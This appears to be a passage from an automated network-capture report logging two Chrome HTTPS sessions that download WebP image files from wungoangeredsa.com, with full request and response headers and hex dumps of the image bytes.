                                                                                                          2025-01-06 11:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          118192.168.2.450172104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:26 UTC464OUTGET /_next/static/media/m_28.094ddc20.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:27 UTC497INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:27 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 9632
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-25a0"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 991
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:27 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4183f8c24261-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:27 UTC872INData Raw: 52 49 46 46 98 25 00 00 57 45 42 50 56 50 38 20 8c 25 00 00 b0 e8 00 9d 01 2a 00 02 00 02 3e 6d 36 95 47 a4 3f a2 21 29 92 89 4b f0 0d 89 67 6e d7 eb 38 94 e1 0c 33 4f 84 ac 30 a6 61 eb 07 44 fc bb f3 fe 0e 7b 6b 93 87 24 fe 6f fe 8f c2 3f e0 7f e3 77 91 fe fd ff 07 d8 6f f9 9f f9 4d f2 0f 41 6f f7 fe 40 3d 7d fd 00 f6 99 fd 00 f2 01 d0 0f fc 03 d2 af ea 1f fa ff d1 ff a4 fd c0 e9 30 fe 2b ff bf 7c 03 b4 aa 0b 63 7d 0e 98 7f 1d ea 20 32 bf ff fc c0 7f ff e8 ff e8 fe d9 b5 f3 cf e1 ef f5 7c 5b fc 83 ea 7f d5 79 b1 e8 ee 31 3e c8 3f c0 f1 ff f2 bd 1d 50 89 d6 0d 3a 96 3a d7 f7 df b5 9e 33 de cc e2 e5 25 b5 0a 9a 7d 30 15 da 6a 44 1a 12 76 6b e7 1a bd 48 e3 57 b2 93 e2 c2 06 78 a9 20 e4 1f 1f b0 09 a6 8d d4 46 7f 07 11 15 0d a6 c0 a1 cb 42 34 ca d3 64 fc b3
                                                                                                          Data Ascii: RIFF%WEBPVP8 %*>m6G?!)Kgn83O0aD{k$o?woMAo@=}0+|c} 2|[y1>?P::3%}0jDvkHWx FB4d
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 91 0c c9 0e 88 ea aa ba b7 de da 15 b4 55 f2 69 11 c9 3c 6b bb fb 03 25 af fc 25 c8 be 9a b8 2e 4e ad 55 21 b0 30 1c 5b a8 c0 3b 78 86 89 ed 7e b0 08 1a 75 da ae a0 80 a2 9e b6 a3 9f 43 69 34 5f 63 3e bb b0 6c ae 30 5d c0 97 e1 90 cf 7a 76 f1 14 38 55 a5 0a 0e 17 af 90 ae fd b0 48 69 8b fd d6 6a 74 7f 7e 21 30 a7 f2 63 60 f7 e7 dd 18 55 be b0 e7 00 60 f6 81 87 56 05 4a a4 2f 36 08 6f 49 93 fd 66 53 af 2a 63 a7 c4 cd 93 50 38 59 03 ab aa 4f 14 94 d4 6b 2e 27 4a 04 5c 10 2e 58 8a ef 90 d0 29 a7 e8 83 b4 d5 e3 ed 50 fd 81 34 6f 40 8e ce dc 20 76 c3 b6 33 9c 20 d2 80 dd 29 23 d7 d0 22 28 a9 05 b4 b0 dc 49 71 f1 72 61 f4 8d 28 5e d9 4f d5 aa d5 ce 7d 9f 3f f4 7e 18 05 8a 76 fb e9 eb 08 57 87 62 1d 66 5f 4a ba 03 98 3a 93 88 69 28 b0 0f 8b fe 94 49 75 ca 86 3a
                                                                                                          Data Ascii: Ui<k%%.NU!0[;x~uCi4_c>l0]zv8UHijt~!0c`U`VJ/6oIfS*cP8YOk.'J\.X)P4o@ v3 )#"(Iqra(^O}?~vWbf_J:i(Iu:
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: d3 d9 41 e0 f3 d6 9f f9 81 e6 00 62 c3 6f 3d 58 c6 cc c8 07 04 e5 b9 5a a3 52 4c 7f cd 8c 3a ab af 54 90 a9 e8 21 c6 79 c0 4e fe 42 60 51 1d 44 a5 65 4a fd f6 d3 fc b4 03 0a 0e c3 45 73 2a d3 45 e8 99 31 75 b2 ab 5a 7a 80 a1 37 ad 6a 36 e1 7d d8 43 19 88 bb 0a dc df 74 35 2f 8b 67 3e 52 a6 8f 1e b0 58 2f 79 6b 1e c0 9d 37 d7 d9 d7 55 8a c8 46 fe 9a a6 1c 28 fa 80 24 4c 3a c0 ac a0 d5 c0 72 2e 08 14 1d 21 23 1c 9f 99 45 59 42 20 ab 42 8c 96 6c 16 57 fc a4 24 fd 7b 55 e7 c1 09 e7 c2 b8 30 1f 1b 28 3a 24 95 24 d4 4e 8a 12 60 2c a5 5e 81 d2 72 2b 17 d5 9f 4c 52 4f 04 cb cf 81 69 d5 c5 30 9e cf 2f 65 9e bf e0 5e f2 a3 3d ce 9a 13 56 07 98 77 f6 83 f4 86 19 f3 1a 70 c3 b8 f0 24 8f c7 4b f4 d6 69 aa ce 9a 68 ed fd 2e 3b 09 78 ab b7 d8 a7 69 ae 00 9c cc 59 5e 37
                                                                                                          Data Ascii: Abo=XZRL:T!yNB`QDeJEs*E1uZz7j6}Ct5/g>RX/yk7UF($L:r.!#EYB BlW${U0(:$$N`,^r+LROi0/e^=Vwp$Kih.;xiY^7
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 77 da ef 94 bf 12 ff 5a 22 1b 37 3c 98 ec 77 61 a6 1a 22 a4 23 e2 81 1f c7 88 00 6d ef 61 56 90 f5 4a f1 70 2b 6a 65 65 f1 60 d7 93 fa 7c 30 c0 7c 4e 39 d2 d5 34 78 57 87 92 c9 61 77 1f 72 be c8 02 46 8a 60 80 b6 3b 91 31 fd 1d dc 22 bd 64 6b 2a 7a 22 e1 1f 10 69 00 4b 0a 98 4b af 28 33 98 78 d9 29 41 82 a3 6c 6f 2e 1e 25 50 e4 c2 46 21 82 87 bd 5c f0 2e b7 3f 7c fe ba e8 59 c2 53 41 0b 7c f5 d6 d6 ac f2 45 e1 7f e5 dd dc 40 b9 5b 7f f1 d3 99 12 75 8c aa d8 4d 62 da 92 23 5b 41 2e d1 45 70 30 2d b3 59 a6 59 2c b9 06 6b ba 8c 6c 7f 76 36 31 84 1b 67 23 d4 50 b8 8e 52 16 a3 b8 8b 00 79 82 a8 66 92 b4 b6 60 0e 74 22 ff e5 fb 95 78 2b 99 c9 7c 48 ab 94 be 92 e7 e9 89 5e 9b 74 c4 1e eb d2 b8 4e 9c 42 f3 c6 f9 61 f1 92 31 0c 53 79 14 cd 6f 4b b3 7f c2 69 ed c4
                                                                                                          Data Ascii: wZ"7<wa"#maVJp+jee`|0|N94xWawrF`;1"dk*z"iKK(3x)Alo.%PF!\.?|YSA|E@[uMb#[A.Ep0-YY,klv61g#PRyf`t"x+|H^tNBa1SyoKi
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: a4 45 c8 24 ec 2a 1a bc 15 7d 0a 0c 13 62 1c 9f 27 ba 71 3c 39 a6 47 97 28 ec ff 53 14 cb 6f 6c fd 56 66 85 72 33 26 4d 94 2d 76 58 cf 72 b5 1b 21 25 97 dc 82 30 35 29 59 be 85 20 f1 06 88 ef 91 12 da b0 fa 6d 25 cd f7 59 68 59 66 52 c6 19 08 f7 9e 37 68 ec 44 54 e0 04 79 11 ed 45 51 7f 57 1f 3e ca 83 90 dd 91 82 7d b7 24 8a ef 55 ba 78 17 12 06 88 88 23 32 c5 4f d1 eb 72 fa cd 21 d5 20 6c 46 8c da 87 5e 55 63 41 6e 9d fb f1 c3 4a eb c2 a5 f4 b3 f9 b3 d6 88 50 3d 49 dd 4a f7 51 82 b2 68 9b 30 fc 78 54 1f 68 c3 50 f3 4b 7d 4a 37 a3 3b a5 ef 76 5d f0 fa ed 15 3d 90 a6 ed 51 1d 1e 8e db fb f5 bf 02 f5 b7 0e fd a9 b8 9e b2 aa de 13 6d 9a 41 1a a8 2d fa 9f e1 a5 6e 7c cb 01 d5 53 0d be b6 7f ee 60 77 f8 f0 13 69 b5 76 ec 6a 76 ea bb 14 31 47 5b c9 68 68 58 37
                                                                                                          Data Ascii: E$*}b'q<9G(SolVfr3&M-vXr!%05)Y m%YhYfR7hDTyEQW>}$Ux#2Or! lF^UcAnJP=IJQh0xThPK}J7;v]=QmA-n|S`wivjv1G[hhX7
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: b5 b1 0b 2a d2 a6 2f 5d 41 df 8b d9 45 64 18 d4 27 d9 0d cd d4 59 28 a5 9d fc 56 f6 d8 57 4d ba 55 74 b7 3b 7b ec dc dc 9d 60 f4 09 7e 0c 8a f2 98 68 42 3a 91 4c 29 eb a1 80 07 4f ef 37 46 66 1e 53 77 c4 ca 62 51 f9 45 b0 f9 9d 5d 32 e4 0a a1 71 d9 26 16 8a 49 23 bf 8a 63 d4 dc c7 cc 9f 76 2f 81 1f 08 18 e9 01 18 1c da 9f 0c 30 df 32 87 03 4a 6d 5c e6 d7 5e e7 35 3a d3 10 f0 ff 87 5e 86 33 7f 0f f5 54 73 14 59 86 aa 45 cb f1 ab 28 85 03 e4 50 be 8d 95 b9 bf a0 df bf 53 e3 bb 95 c7 26 87 4b 9c dc 33 24 13 c1 34 69 70 52 5d eb c5 5a b3 94 33 a3 ca 37 d5 6c 30 22 f5 e3 54 fc 00 00 1e b0 ff 8d e8 02 6c f9 44 f7 55 ef de ba 9a d1 10 a0 f3 e3 72 eb 4f e4 70 0f cf 79 09 03 a6 42 17 d9 27 25 81 e4 c4 d8 b7 00 0f 3b 6c 80 2c 7c b9 80 5b 14 ae d5 c4 e4 34 df a8 4e
                                                                                                          Data Ascii: */]AEd'Y(VWMUt;{`~hB:L)O7FfSwbQE]2q&I#cv/02Jm\^5:^3TsYE(PS&K3$4ipR]Z37l0"TlDUrOpyB'%;l,|[4N
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 3e c1 3f 35 50 ab 12 d3 b9 9d 71 bb e0 16 45 b4 b0 ec 27 b6 79 46 d0 89 25 75 36 6c a9 52 df 8e dc e2 7e d0 47 77 cf 32 6b d5 cf 90 9b 38 dd 92 19 f9 9c 1b 21 91 8e 99 71 74 48 6b 93 4c 43 d9 34 c2 49 5e 5a af 5f dd 10 fc 0f 00 63 e6 30 a9 e5 ea f0 f0 9e 21 71 cc 87 1c 2a b9 06 11 a4 68 2c f0 00 00 07 e3 0c 1a 2c b1 ca e9 92 b6 46 c8 6c 91 e6 df f6 6d 33 5c 6e 4d 68 ff 66 74 c0 aa 85 f2 81 28 49 0f 47 b9 3c 3d 8d c5 bb 6f 9f 5c 4f 6d ff 19 5b a3 54 01 93 9c 03 6a 5b cf de 2d f7 4e 7a 6f 67 fe dc 48 6b c3 8e 93 47 64 b4 42 5a 7c b1 5d 02 f0 fb 21 7c cb a5 1c 03 94 f9 0d 84 e4 94 72 c8 bc 3c e9 c8 31 f8 43 8f 17 d9 23 ba bc 7e 27 dc 00 00 06 23 20 90 20 ef 18 53 62 7b ba f9 ee b0 92 c5 9e 0a 12 52 9c 66 83 c8 59 4d 0e a2 28 8a f6 f7 13 c7 2d fd 1e 61 12 87
                                                                                                          Data Ascii: >?5PqE'yF%u6lR~Gw2k8!qtHkLC4I^Z_c0!q*h,,Flm3\nMhft(IG<=o\Om[Tj[-NzogHkGdBZ|]!|r<1C#~'# Sb{RfYM(-a
                                                                                                          2025-01-06 11:09:27 UTC546INData Raw: e8 56 84 d6 a0 15 e5 c5 ad 25 21 d9 28 30 98 15 db 98 c7 46 66 5f 12 33 b0 e4 da 40 96 47 e2 49 82 7e ae 76 66 9f e3 ab 0f 7c f6 4b 32 bb f6 ed 04 60 72 d3 06 1c cc 8e e3 f6 c5 d5 2a b4 d5 1f 2a fd 99 56 59 9d e6 63 86 3e 68 8d b5 84 ef 71 08 f2 3f 35 73 8f 21 f9 f9 ee b1 3a b8 8d 0d e5 4f b6 de 96 7a 4d f0 5f 51 e2 5e 67 9e 28 27 86 22 37 5b 4a aa b4 18 36 a6 00 f2 9b 93 88 08 d4 eb a2 cc 92 7c 9c 1e f2 75 6a 45 1d ba d6 ba ad c0 c6 c9 01 5e 1d 34 a8 af 9b d4 f2 ba b0 b3 d4 f0 be 09 c6 c0 65 0e 94 f5 0c b6 df 8b 0b 20 7a fc b7 4f 65 47 e8 8f 33 d3 a7 fe 5b bf c0 f7 31 30 47 f8 ea 84 f1 26 32 db 4e 9c 14 ed bb 74 76 ed cd 11 31 9d 78 0b 85 ed d1 6e 8d d0 2f 45 97 90 17 9a 47 ad ab 3c d4 37 b7 ca 2b 02 a5 5e 4f 63 f5 5b 2f 0c f7 9b cf b0 2a a5 eb f2 39 55
                                                                                                          Data Ascii: V%!(0Ff_3@GI~vf|K2`r**VYc>hq?5s!:OzM_Q^g('"7[J6|ujE^4e zOeG3[10G&2Ntv1xn/EG<7+^Oc[/*9U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          119192.168.2.450171104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:26 UTC464OUTGET /_next/static/media/m_20.62b047c4.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:27 UTC498INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:27 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 13378
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-3442"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 991
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:27 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41841f38726f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:27 UTC871INData Raw: 52 49 46 46 3a 34 00 00 57 45 42 50 56 50 38 20 2e 34 00 00 90 33 01 9d 01 2a 00 02 00 02 3e 6d 2e 91 45 a4 22 a1 98 59 3e 2c 40 06 c4 b3 b7 16 7d 7f e4 e8 fe a5 fe df ec a7 96 ff 7e 2b 11 fc 0f 85 f8 40 fa 9b 7e 0f c1 68 56 66 16 3e b3 52 8f 01 c3 06 cc 6d 8f af 7c f8 fd b3 e4 9e b0 fe 4d fe 13 fd 2f 32 ce 23 fc df fb df f6 3f dd 9f f0 fc 4d 1e 23 fd fb fd 57 b8 1f f1 3f e6 7f e2 3f b7 fa 00 7f 66 ef e9 fe be a1 bf eb ff 81 ff d0 fe cf e6 2f fe 07 b5 bf a0 df f2 bf b2 fc 31 fe 84 7f d4 fe c7 e8 77 f8 87 50 07 f0 ef e0 bf f5 bf b3 fb 69 fd 37 fe 67 f7 1f ce 4e 93 ff e1 9f f7 ff b8 f1 00 7e 80 74 53 41 6b 6f a1 13 05 f9 37 fc f4 6a 8f df 7f f4 77 5d f7 fa 5b f5 eb d6 af c7 bf 5f ff b1 fd c3 a9 67 ea 9f bb fa fc 62 8f d5 3b 32 66 27 fc bf 23 7f 0b f1 bf f9
                                                                                                          Data Ascii: RIFF:4WEBPVP8 .43*>m.E"Y>,@}~+@~hVf>Rm|M/2#?M#W??f/1wPi7gN~tSAko7jw][_gb;2f'#
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 23 c5 12 41 0f 85 41 34 09 a8 be 36 8f 3c a6 66 18 07 95 49 e4 ba 10 a7 db 02 6b 47 b6 d6 65 7b 90 da 93 c4 a5 c6 4b 7c 68 f7 0a 23 8f 69 d0 16 8d d2 77 7e 05 ae ef 22 08 b1 20 62 e3 ce b3 56 e6 0b 23 ef d0 dd e3 db ec 20 2e e9 94 c0 02 f1 38 2a c7 1a ac a5 87 2e 09 a8 ec d6 b4 43 92 9c 88 85 88 1b d1 7d d9 de 8f 7e 88 a6 fc 4e 9a 4a 54 77 e9 0c 7c 73 d4 5c cc 57 d3 06 49 06 21 51 4e 97 aa 32 15 11 93 83 19 92 d0 60 ea c3 5a 2b 6b f5 44 16 74 13 fb 53 b3 13 fb 84 86 e9 20 49 fd 5a 28 2e 20 16 e5 ae d9 68 d0 a6 7b cd df e3 e9 52 a6 0e e0 18 ed e2 3a d2 52 e8 40 4b 0b 6a 7f ec e5 84 cc c1 5a 09 15 67 77 b7 d0 3c 81 00 75 52 a8 89 6a ef 45 08 10 aa 74 08 c3 f7 64 01 3c 3c 8f 51 61 96 13 c1 8b c6 c5 66 ff 5e d4 19 58 e2 7f e4 b9 a1 a3 57 2f d7 e5 ba 7c 03 69
                                                                                                          Data Ascii: #AA46<fIkGe{K|h#iw~" bV# .8*.C}~NJTw|s\WI!QN2`Z+kDtS IZ(. h{R:R@KjZgw<uRjEtd<<Qaf^XW/|i
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 08 a3 86 a1 83 69 fa dc fc 4c 20 df 9d 45 04 a6 f0 dd 02 d6 17 a1 12 f7 29 bb 53 9b a3 87 ca 4d 36 f0 b9 f9 87 df 7c c8 d6 6e 92 79 89 a5 5e f0 57 38 dc 0d 64 91 ef 46 12 de 4f 16 0e 4f 02 04 b6 4e 99 cc 51 eb a2 f5 9e 54 3c dc f7 19 07 58 19 26 89 8f 25 f3 30 55 ae 1f e3 63 75 a6 c5 e1 be 60 0a 50 a8 cf 33 20 89 33 77 01 22 ce 84 29 0f fb 5f a8 3c 41 11 2f 62 ff 34 d9 c8 26 69 65 6e e5 ff 29 ab 6e 1e 25 c4 33 2e 4a 81 24 c8 51 e2 cf f6 09 3d 35 23 a9 d2 c5 c7 72 17 3d a6 d2 4a 60 c0 94 1a 3e 55 d9 2a 5a 07 8c 94 51 6c 2c 6c 0b 1d 30 3a c9 a7 7a c0 a5 60 ed 14 9a 3e a4 50 a1 c4 4d 88 55 d8 95 b2 33 64 4e 73 32 71 09 c8 1a 4f ba 6b dc db e6 53 38 38 2e a9 5b c5 df ed 77 b5 c0 c2 1b 0b de 98 63 fb 97 49 23 28 e5 d8 fc 01 89 15 67 66 ec 00 00 fe f9 1d 4c 07
                                                                                                          Data Ascii: iL E)SM6|ny^W8dFOONQT<X&%0Ucu`P3 3w")_<A/b4&ien)n%3.J$Q=5#r=J`>U*ZQl,l0:z`>PMU3dNs2qOkS88.[wcI#(gfL
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 8e 08 ff b0 ed 23 e4 e7 94 33 a0 20 db 26 70 cb da 3f da 81 b4 eb 94 7d f8 3f 8e d8 b9 47 71 89 a9 1d 09 0c 52 93 84 eb 9f 57 7c 56 32 d2 93 ec 09 ce 5a 11 8d 12 d6 3b c1 7f ce c7 be 88 eb 40 14 56 ac 18 74 80 0a 6a 57 36 82 b6 e4 22 79 68 5b cd 37 31 11 d1 39 39 93 cf 24 b3 f3 3d c9 e9 20 8e 1b fa c3 f1 aa e8 1a ef 14 2e 18 26 6e 11 1f a1 c2 6c 4b 04 0e 92 eb f6 84 bd af 12 8d 25 1e cc 20 51 63 c1 30 08 ce b1 0a 81 90 df f9 9a 88 10 16 9f ff a5 b2 1f d5 85 bf 41 23 04 4e ec d4 f5 6a 46 91 97 1e 5b c3 8e 88 f9 a1 17 eb dc 75 d1 fc 61 86 9c 25 e9 57 56 23 2d 3c b7 dc 8a 5e 48 fd a5 1f 1a ac f7 a6 41 1a b5 fd 4d 40 12 4a c4 28 16 a7 a8 59 c5 ac 8f 16 f9 e9 75 e6 14 b8 96 0c 68 e1 c9 6d 76 54 60 79 a3 88 20 72 23 19 91 87 46 cd 42 e3 5c 7c 37 01 fd 29 12 20
                                                                                                          Data Ascii: #3 &p?}?GqRW|V2Z;@VtjW6"yh[7199$= .&nlK% Qc0A#NjF[ua%WV#-<^HAM@J(YuhmvT`y r#FB\|7)
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 02 29 e3 58 99 79 1c cd 09 24 43 36 7d 46 2f c2 29 1e fc 33 8f 66 d2 ce a0 30 5b fd 09 97 90 d7 e7 4d 6b 2e 73 02 d2 6e 97 81 f8 23 cc 8f e9 b3 e7 bd e9 34 24 7d 61 48 5d 30 c7 b3 ab fd b9 0f 00 91 20 89 fb b1 fd a2 35 2d f5 f8 85 ef 88 ba f1 78 5a 19 dc 0a 41 5d f8 f8 c0 7e 5a 48 18 16 bb 3b 77 2b 54 c1 9e 5b 74 ad 77 30 9b 40 46 c2 c1 10 40 3a ef 9d f3 10 2f a1 62 30 87 27 92 21 92 94 66 35 3b 09 ae 8c fb 07 99 24 c8 17 eb b6 31 b2 c0 22 11 8f ee 61 b8 e7 46 01 bf 6e c9 14 3d c1 7e b7 1a 7b 9e 77 59 1e 45 6b c7 25 6b 2b 43 4c 97 2e 0c 18 9c f1 e6 2c d9 22 71 88 7c f6 17 55 dc f7 74 f3 7c 75 2a f7 6d b6 51 69 21 89 d3 8f 14 4e 1e ef 0a d5 ed e7 84 71 fb 17 54 b7 65 7c f3 04 e4 c8 60 aa 49 7a 02 19 77 c5 ca 8c 38 0a 67 d6 4d 92 6c bd 38 9f 9c 9c 74 b9 7e
                                                                                                          Data Ascii: )Xy$C6}F/)3f0[Mk.sn#4$}aH]0 5-xZA]~ZH;w+T[tw0@F@:/b0'!f5;$1"aFn=~{wYEk%k+CL.,"q|Ut|u*mQi!NqTe|`Izw8gMl8t~
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 00 94 f3 b7 8d 76 20 18 ab b5 53 e7 7b 55 f0 cb cf 6a a0 a1 8c 72 99 89 c3 0c 3f 62 82 13 54 48 d6 a2 67 ae 1a 51 39 5e 57 29 44 90 28 81 d7 ce 77 30 30 19 d3 b7 e5 f4 7e ed 23 68 9f 7a 77 f8 28 29 e6 c0 b6 b0 1b b2 3d 07 76 2b 0b 9e 4f db e7 d9 5a 68 15 66 67 9d d3 d7 2e 01 60 ea 91 2e 10 4b 4c 30 a5 c2 e0 f6 b0 c3 8f b8 54 46 01 eb f2 44 80 dc 17 92 0a 39 04 68 ce bb 8a 79 fb b5 f7 2d 49 84 30 f9 43 73 24 ba 94 54 42 ba 03 97 a3 d4 76 27 05 27 e5 27 61 70 06 e4 7a f2 dc 9b c9 a1 72 a3 bc c8 88 a2 44 f4 a2 2a f0 da 55 7b c7 5d 2d 68 0b e6 fa 9a 00 05 47 b2 5e 16 92 2e b7 47 db 38 72 e4 d7 10 b3 00 25 39 93 8f 9b 33 ef ce 5a e3 e1 83 d5 97 2e 6f 37 59 29 3e a7 e3 0b 4e 61 bf 90 a1 a1 ce e8 bb 76 4d 8b 50 33 0f ae c2 64 47 3a 8b 7d a8 a5 4f 3a d1 58 e1 9a
                                                                                                          Data Ascii: v S{Ujr?bTHgQ9^W)D(w00~#hzw()=v+OZhfg.`.KL0TFD9hy-I0Cs$TBv'''apzrD*U{]-hG^.G8r%93Z.o7Y)>NavMP3dG:}O:X
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: ca 3e f0 ec 1a 9a c9 3a 79 6b eb 5e 07 4f 21 1c 2a 68 e2 72 03 e6 9c d7 d1 c1 33 d0 e1 79 4e 67 fb a6 73 b7 b3 9a e1 13 43 5c c1 6f 43 3a e9 5f 07 b7 af 90 c9 95 25 5f c4 67 9e a0 51 9a ca 76 c3 62 9a 71 29 9a 62 78 eb e8 d9 3a 16 3d 1c 07 c9 8f 0b 19 7b 1b ec cc 6a a4 38 bd bb 34 b0 95 3b a4 73 cd 00 eb 47 52 f0 ae fc b8 1c ff e7 09 2d 08 02 1d b3 f0 4d 90 60 2f 65 fc 67 99 80 03 cc 23 03 20 4a 79 84 7e e9 05 fb 5c dd 54 49 6c 16 9a 2f f7 86 18 39 ad 34 42 e0 d3 1a f1 4e c8 dd b1 ba 04 0b 88 0c 48 68 21 f4 db 40 3a 9c e8 a1 f6 84 29 fc 31 c9 bc ac ac 3d 10 7a 74 11 06 cd 9c d2 96 c7 14 09 17 1c 10 51 c0 30 f4 4e d4 7e e2 6f 7b b6 ab 0c 50 f9 fb 31 0a f5 73 b0 23 3f 70 7d 8b e0 ab 18 dd 60 26 0b 51 d7 02 2d 69 56 c9 e2 5f 34 16 f2 b3 df e6 fb 7d 3f b3 bf
                                                                                                          Data Ascii: >:yk^O!*hr3yNgsC\oC:_%_gQvbq)bx:={j84;sGR-M`/eg# Jy~\TIl/94BNHh!@:)1=ztQ0N~o{P1s#?p}`&Q-iV_4}?
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 77 b3 28 42 69 d8 07 e9 d1 5f 77 38 b0 63 79 80 48 92 a1 a2 76 f2 69 63 1b b3 96 e8 cc 61 04 eb 70 b5 eb 95 9d e9 43 90 57 16 b8 9d ec 66 57 21 8a f6 b7 8c 31 98 17 8c 35 64 21 e2 96 ce 42 e8 b4 2c 12 c3 ce ec ec 1d 89 bf 63 02 34 63 dc c4 e6 4f a4 01 44 99 8f cf 80 11 f7 76 9b 2b 9b e2 31 94 eb 45 7a 58 32 45 c8 0b 5b fc 21 c5 89 bd c9 55 c9 5d d8 f7 5a be aa f5 52 c5 41 ff a0 16 71 f4 4b 9e 94 df 60 24 dc 4c ec 4b 1a 90 bb 93 0d 2c c3 42 e7 c3 ef ad 7b ce b1 08 6f 1a 0c d7 2f f9 8a da 09 70 01 a3 53 64 14 e5 ad 8c 0a 0c 31 e4 e0 d7 6f 86 65 94 e2 23 31 8e c6 00 2e 6b c2 52 8b 88 56 cd 32 ce ea eb 96 65 f0 97 4d 57 0f e4 72 9d 2c 2b 14 4a 79 80 80 ab 56 8e 2d 9d a7 d0 4a 10 50 78 d8 0b 1a 27 58 95 31 60 97 04 ec 49 78 b5 f4 07 d9 10 65 4f 0b f8 1f 39 98
                                                                                                          Data Ascii: w(Bi_w8cyHvicapCWfW!15d!B,c4cODv+1EzX2E[!U]ZRAqK`$LK,B{o/pSd1oe#1.kRV2eMWr,+JyV-JPx'X1`IxeO9
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: ad d9 79 fa 69 a5 1f a3 3a 69 85 54 1f a3 e9 93 de a7 ca f9 b2 9b 2c 9b 9d d0 b7 c4 a9 26 48 91 ec b4 4d b3 06 f0 bd f7 32 d1 38 2c 0c e5 90 57 0f 43 d1 a9 a9 0f e7 50 9c fd 7a 29 d1 d4 65 10 e7 f4 6a ff 81 90 4b ea a1 78 31 ae 8d 7a 51 74 a3 cc 50 c8 c0 08 01 3c 06 88 ab aa ea a3 17 23 7e 87 c2 b8 d9 f6 4e 0f 45 0d 44 5c 6c d5 54 e7 c0 40 20 a7 ff f8 56 10 36 e4 a2 ab fa e2 8c cd 56 1c ac 11 c6 3d 21 62 5b 19 42 9c c4 c4 52 47 c9 7a 99 ef 1c 47 fc d7 ee e0 38 71 8e d3 0d 95 dc 77 0a 3c ca f2 62 f8 47 85 14 58 46 f4 b1 68 20 30 52 20 0d 30 f1 15 d0 26 23 fc d4 f8 bf 38 65 1b 35 80 8b 55 f4 66 da 44 48 02 64 12 0f d9 9d f6 fc 4e ae 09 a2 a6 ae 6f a9 d3 55 11 54 a7 89 ce 06 2b 7a e2 b7 ae 4e 2e 22 94 96 70 6b 83 48 ad f1 b8 be e2 a7 d0 15 8d e7 2b a2 31 c6
                                                                                                          Data Ascii: yi:iT,&HM28,WCPz)ejKx1zQtP<#~NED\lT@ V6V=!b[BRGzG8qw<bGXFh 0R 0&#8e5UfDHdNoUT+zN."pkH+1
